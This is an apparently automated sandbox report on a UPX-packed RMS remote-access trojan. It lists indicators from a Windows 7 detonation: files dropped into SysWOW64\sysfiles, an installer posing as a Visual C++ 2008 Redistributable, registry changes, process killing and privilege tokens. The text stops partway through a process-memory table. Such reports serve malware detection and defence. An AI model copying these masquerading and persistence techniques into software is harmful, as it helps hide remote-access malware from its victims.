Malware Analysis Report

2024-11-30 19:49

Sample ID 220128-r4yy6sfbf9
Target a73eac15797130c381b5b4a65c3fb1cfc723b1586a1882c981211787bba285a6
SHA256 a73eac15797130c381b5b4a65c3fb1cfc723b1586a1882c981211787bba285a6
Tags
rms evasion rat trojan upx
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V6

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

a73eac15797130c381b5b4a65c3fb1cfc723b1586a1882c981211787bba285a6

Threat Level: Known bad

The file a73eac15797130c381b5b4a65c3fb1cfc723b1586a1882c981211787bba285a6 was found to be: Known bad.

Malicious Activity Summary

rms evasion rat trojan upx

RMS

UPX packed file

Stops running service(s)

Executes dropped EXE

Loads dropped DLL

Enumerates connected drives

Drops file in System32 directory

Drops file in Windows directory

Launches sc.exe

Enumerates physical storage devices

Views/modifies file attributes

Suspicious use of WriteProcessMemory

Runs ping.exe

Modifies data under HKEY_USERS

Enumerates processes with tasklist

Suspicious behavior: EnumeratesProcesses

Runs net.exe

Modifies registry class

Suspicious behavior: SetClipboardViewer

Suspicious use of AdjustPrivilegeToken

Kills process with taskkill

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2022-01-28 14:45

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2022-01-28 14:45

Reported

2022-01-28 15:01

Platform

win7-en-20211208

Max time kernel

151s

Max time network

149s

Command Line

"C:\Users\Admin\AppData\Local\Temp\a73eac15797130c381b5b4a65c3fb1cfc723b1586a1882c981211787bba285a6.exe"

Signatures

RMS

trojan rat rms

Stops running service(s)

evasion

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\set.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\SysWOW64\sysfiles\rfusclient.exe N/A
N/A N/A C:\Windows\SysWOW64\sysfiles\rfusclient.exe N/A
N/A N/A C:\Windows\SysWOW64\sysfiles\rfusclient.exe N/A
N/A N/A C:\Windows\SysWOW64\sysfiles\rfusclient.exe N/A
N/A N/A C:\Windows\SysWOW64\sysfiles\rfusclient.exe N/A
N/A N/A C:\Windows\SysWOW64\sysfiles\rfusclient.exe N/A
N/A N/A C:\Windows\SysWOW64\sysfiles\rfusclient.exe N/A
N/A N/A C:\Windows\SysWOW64\sysfiles\rutserv.exe N/A
N/A N/A C:\Windows\SysWOW64\sysfiles\rfusclient.exe N/A
N/A N/A C:\Windows\SysWOW64\sysfiles\rfusclient.exe N/A
N/A N/A C:\Windows\SysWOW64\sysfiles\rfusclient.exe N/A
N/A N/A C:\Windows\SysWOW64\sysfiles\rfusclient.exe N/A
N/A N/A C:\Windows\SysWOW64\sysfiles\rfusclient.exe N/A
N/A N/A C:\Windows\SysWOW64\sysfiles\rfusclient.exe N/A
N/A N/A C:\Windows\SysWOW64\sysfiles\rutserv.exe N/A
N/A N/A C:\Windows\SysWOW64\sysfiles\rfusclient.exe N/A
N/A N/A C:\Windows\SysWOW64\sysfiles\rfusclient.exe N/A
N/A N/A C:\Windows\SysWOW64\sysfiles\rfusclient.exe N/A
N/A N/A C:\Windows\SysWOW64\sysfiles\rfusclient.exe N/A
N/A N/A C:\Windows\SysWOW64\sysfiles\rfusclient.exe N/A
N/A N/A C:\Windows\SysWOW64\sysfiles\rfusclient.exe N/A
N/A N/A C:\Windows\SysWOW64\sysfiles\rutserv.exe N/A
N/A N/A C:\Windows\SysWOW64\sysfiles\rutserv.exe N/A
N/A N/A C:\Windows\SysWOW64\sysfiles\rfusclient.exe N/A
N/A N/A C:\Windows\SysWOW64\sysfiles\rfusclient.exe N/A
N/A N/A C:\Windows\SysWOW64\sysfiles\rutserv.exe N/A
N/A N/A C:\Windows\SysWOW64\sysfiles\rfusclient.exe N/A
N/A N/A C:\Windows\SysWOW64\sysfiles\rfusclient.exe N/A
N/A N/A C:\Windows\SysWOW64\sysfiles\rfusclient.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\sysfiles\rfusclient.exe N/A
N/A N/A C:\Windows\SysWOW64\sysfiles\rfusclient.exe N/A

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\L: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Q: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Y: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\B: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\J: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\R: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\T: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\V: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\W: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\E: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\M: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\K: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\N: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\S: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\H: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\I: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\G: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\O: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\P: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\U: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\X: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Z: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\A: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\F: C:\Windows\system32\msiexec.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File created C:\Windows\SysWOW64\sysfiles\rfusclient.exe C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\SysWOW64\RWLN.dll C:\Windows\SysWOW64\sysfiles\rutserv.exe N/A
File created C:\Windows\SysWOW64\sysfiles\dsfvorbisdecoder.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\SysWOW64\sysfiles\gdiplus.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\SysWOW64\sysfiles\microsoft.vc90.crt.manifest C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\SysWOW64\sysfiles\msvcr90.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\SysWOW64\sysfiles\oledlg.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\SysWOW64\sysfiles\rwln.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\SysWOW64\sysfiles\ripcserver.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\SysWOW64\sysfiles\vp8encoder.dll C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\SysWOW64\RWLN.dll C:\Windows\SysWOW64\sysfiles\rutserv.exe N/A
File created C:\Windows\SysWOW64\sysfiles\dsfvorbisencoder.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\SysWOW64\sysfiles\msimg32.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\SysWOW64\sysfiles\msvcp90.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\SysWOW64\sysfiles\rasadhlp.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\SysWOW64\sysfiles\rutserv.exe C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\SysWOW64\sysfiles\vp8decoder.dll C:\Windows\system32\msiexec.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\Installer\ C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\{AB7AA605-500F-4153-8207-FB5563419112}\ARPPRODUCTICON.exe C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\f760eef.msi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI10E2.tmp C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\f760ef3.msi C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\{AB7AA605-500F-4153-8207-FB5563419112}\ARPPRODUCTICON.exe C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\AdobeUpdates\group.txt C:\Windows\SysWOW64\cmd.exe N/A
File created C:\Windows\Installer\f760eef.msi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\f760ef1.ipi C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\AdobeUpdates\id.txt C:\Windows\SysWOW64\cmd.exe N/A
File opened for modification C:\Windows\AdobeUpdates\id.txt C:\Windows\SysWOW64\cmd.exe N/A
File created C:\Windows\AdobeUpdates\mac.txt C:\Windows\SysWOW64\cmd.exe N/A
File opened for modification C:\Windows\AdobeUpdates\comp.txt C:\Windows\SysWOW64\cmd.exe N/A
File opened for modification C:\Windows\AdobeUpdates\group.txt C:\Windows\SysWOW64\cmd.exe N/A
File created C:\Windows\Installer\f760ef1.ipi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI1F93.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\AdobeUpdates\mac.txt C:\Windows\SysWOW64\cmd.exe N/A
File created C:\Windows\AdobeUpdates\comp.txt C:\Windows\SysWOW64\cmd.exe N/A

Launches sc.exe

Enumerates physical storage devices

Enumerates processes with tasklist

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\tasklist.exe N/A
N/A N/A C:\Windows\SysWOW64\tasklist.exe N/A
N/A N/A C:\Windows\SysWOW64\tasklist.exe N/A
N/A N/A C:\Windows\SysWOW64\tasklist.exe N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Windows\SysWOW64\sysfiles\rfusclient.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Windows\SysWOW64\sysfiles\rfusclient.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26 C:\Windows\system32\msiexec.exe N/A
Key deleted \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25 C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Windows\SysWOW64\sysfiles\rfusclient.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" C:\Windows\SysWOW64\sysfiles\rfusclient.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" C:\Windows\SysWOW64\sysfiles\rfusclient.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" C:\Windows\SysWOW64\sysfiles\rfusclient.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" C:\Windows\SysWOW64\sysfiles\rfusclient.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" C:\Windows\SysWOW64\sysfiles\rfusclient.exe N/A
Key deleted \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" C:\Windows\SysWOW64\sysfiles\rfusclient.exe N/A

Modifies registry class

Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\506AA7BAF00535142870BF5536141921\Remote_Office_Manager C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\506AA7BAF00535142870BF5536141921 C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\506AA7BAF00535142870BF5536141921\InstanceType = "0" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\506AA7BAF00535142870BF5536141921\PackageCode = "558594499A0F7BE41A10BED2C55AA173" C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\506AA7BAF00535142870BF5536141921\Language = "1049" C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\506AA7BAF00535142870BF5536141921\Version = "97648640" C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\506AA7BAF00535142870BF5536141921\AdvertiseFlags = "388" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\506AA7BAF00535142870BF5536141921\SourceList\PackageName = "rms5.2.1.msi" C:\Windows\system32\msiexec.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\506AA7BAF00535142870BF5536141921\Clients = 3a0000000000 C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\506AA7BAF00535142870BF5536141921\ProductIcon = "C:\\Windows\\Installer\\{AB7AA605-500F-4153-8207-FB5563419112}\\ARPPRODUCTICON.exe" C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\506AA7BAF00535142870BF5536141921\SourceList C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\506AA7BAF00535142870BF5536141921\SourceList\Net\1 = "C:\\Users\\Admin\\AppData\\Local\\Temp\\" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\506AA7BAF00535142870BF5536141921\SourceList\Media\DiskPrompt = "[1]" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\506AA7BAF00535142870BF5536141921\SourceList\Media\1 = "DISK1;1" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\506AA7BAF00535142870BF5536141921\SourceList\LastUsedSource = "n;1;C:\\Users\\Admin\\AppData\\Local\\Temp\\" C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\506AA7BAF00535142870BF5536141921 C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\506AA7BAF00535142870BF5536141921\ProductName = "Microsoft Visual C++ 2008 Redistributable - x86 10.0.743894.2047" C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\506AA7BAF00535142870BF5536141921\Assignment = "1" C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\506AA7BAF00535142870BF5536141921\AuthorizedLUAApp = "0" C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\506AA7BAF00535142870BF5536141921\DeploymentFlags = "3" C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\509B38EF4554FFD4794F292971C81B17 C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\509B38EF4554FFD4794F292971C81B17\506AA7BAF00535142870BF5536141921 C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\506AA7BAF00535142870BF5536141921\SourceList\Net C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\506AA7BAF00535142870BF5536141921\SourceList\Media C:\Windows\system32\msiexec.exe N/A

Runs net.exe

Runs ping.exe

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A

Suspicious behavior: SetClipboardViewer

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\sysfiles\rfusclient.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\tasklist.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeCreateTokenPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeMachineAccountPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeTcbPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeCreatePermanentPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeChangeNotifyPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeSyncAgentPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeEnableDelegationPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeImpersonatePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeCreateGlobalPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeCreateTokenPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeMachineAccountPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeTcbPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeCreatePermanentPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeChangeNotifyPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1744 wrote to memory of 760 N/A C:\Users\Admin\AppData\Local\Temp\a73eac15797130c381b5b4a65c3fb1cfc723b1586a1882c981211787bba285a6.exe C:\Windows\SysWOW64\cmd.exe
PID 1744 wrote to memory of 760 N/A C:\Users\Admin\AppData\Local\Temp\a73eac15797130c381b5b4a65c3fb1cfc723b1586a1882c981211787bba285a6.exe C:\Windows\SysWOW64\cmd.exe
PID 1744 wrote to memory of 760 N/A C:\Users\Admin\AppData\Local\Temp\a73eac15797130c381b5b4a65c3fb1cfc723b1586a1882c981211787bba285a6.exe C:\Windows\SysWOW64\cmd.exe
PID 1744 wrote to memory of 760 N/A C:\Users\Admin\AppData\Local\Temp\a73eac15797130c381b5b4a65c3fb1cfc723b1586a1882c981211787bba285a6.exe C:\Windows\SysWOW64\cmd.exe
PID 760 wrote to memory of 540 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\set.exe
PID 760 wrote to memory of 540 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\set.exe
PID 760 wrote to memory of 540 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\set.exe
PID 760 wrote to memory of 540 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\set.exe
PID 760 wrote to memory of 540 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\set.exe
PID 760 wrote to memory of 540 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\set.exe
PID 760 wrote to memory of 540 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\set.exe
PID 540 wrote to memory of 576 N/A C:\Users\Admin\AppData\Local\Temp\set.exe C:\Users\Admin\AppData\Local\Temp\setting.exe
PID 540 wrote to memory of 576 N/A C:\Users\Admin\AppData\Local\Temp\set.exe C:\Users\Admin\AppData\Local\Temp\setting.exe
PID 540 wrote to memory of 576 N/A C:\Users\Admin\AppData\Local\Temp\set.exe C:\Users\Admin\AppData\Local\Temp\setting.exe
PID 540 wrote to memory of 576 N/A C:\Users\Admin\AppData\Local\Temp\set.exe C:\Users\Admin\AppData\Local\Temp\setting.exe
PID 540 wrote to memory of 576 N/A C:\Users\Admin\AppData\Local\Temp\set.exe C:\Users\Admin\AppData\Local\Temp\setting.exe
PID 540 wrote to memory of 576 N/A C:\Users\Admin\AppData\Local\Temp\set.exe C:\Users\Admin\AppData\Local\Temp\setting.exe
PID 540 wrote to memory of 576 N/A C:\Users\Admin\AppData\Local\Temp\set.exe C:\Users\Admin\AppData\Local\Temp\setting.exe
PID 576 wrote to memory of 688 N/A C:\Users\Admin\AppData\Local\Temp\setting.exe C:\Windows\SysWOW64\cmd.exe
PID 576 wrote to memory of 688 N/A C:\Users\Admin\AppData\Local\Temp\setting.exe C:\Windows\SysWOW64\cmd.exe
PID 576 wrote to memory of 688 N/A C:\Users\Admin\AppData\Local\Temp\setting.exe C:\Windows\SysWOW64\cmd.exe
PID 576 wrote to memory of 688 N/A C:\Users\Admin\AppData\Local\Temp\setting.exe C:\Windows\SysWOW64\cmd.exe
PID 576 wrote to memory of 688 N/A C:\Users\Admin\AppData\Local\Temp\setting.exe C:\Windows\SysWOW64\cmd.exe
PID 576 wrote to memory of 688 N/A C:\Users\Admin\AppData\Local\Temp\setting.exe C:\Windows\SysWOW64\cmd.exe
PID 576 wrote to memory of 688 N/A C:\Users\Admin\AppData\Local\Temp\setting.exe C:\Windows\SysWOW64\cmd.exe
PID 688 wrote to memory of 1988 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\chcp.com
PID 688 wrote to memory of 1988 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\chcp.com
PID 688 wrote to memory of 1988 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\chcp.com
PID 688 wrote to memory of 1988 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\chcp.com
PID 688 wrote to memory of 1988 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\chcp.com
PID 688 wrote to memory of 1988 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\chcp.com
PID 688 wrote to memory of 1988 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\chcp.com
PID 688 wrote to memory of 608 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\attrib.exe
PID 688 wrote to memory of 608 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\attrib.exe
PID 688 wrote to memory of 608 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\attrib.exe
PID 688 wrote to memory of 608 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\attrib.exe
PID 688 wrote to memory of 608 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\attrib.exe
PID 688 wrote to memory of 608 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\attrib.exe
PID 688 wrote to memory of 608 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\attrib.exe
PID 688 wrote to memory of 1032 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\attrib.exe
PID 688 wrote to memory of 1032 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\attrib.exe
PID 688 wrote to memory of 1032 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\attrib.exe
PID 688 wrote to memory of 1032 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\attrib.exe
PID 688 wrote to memory of 1032 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\attrib.exe
PID 688 wrote to memory of 1032 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\attrib.exe
PID 688 wrote to memory of 1032 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\attrib.exe
PID 688 wrote to memory of 1712 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\attrib.exe
PID 688 wrote to memory of 1712 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\attrib.exe
PID 688 wrote to memory of 1712 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\attrib.exe
PID 688 wrote to memory of 1712 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\attrib.exe
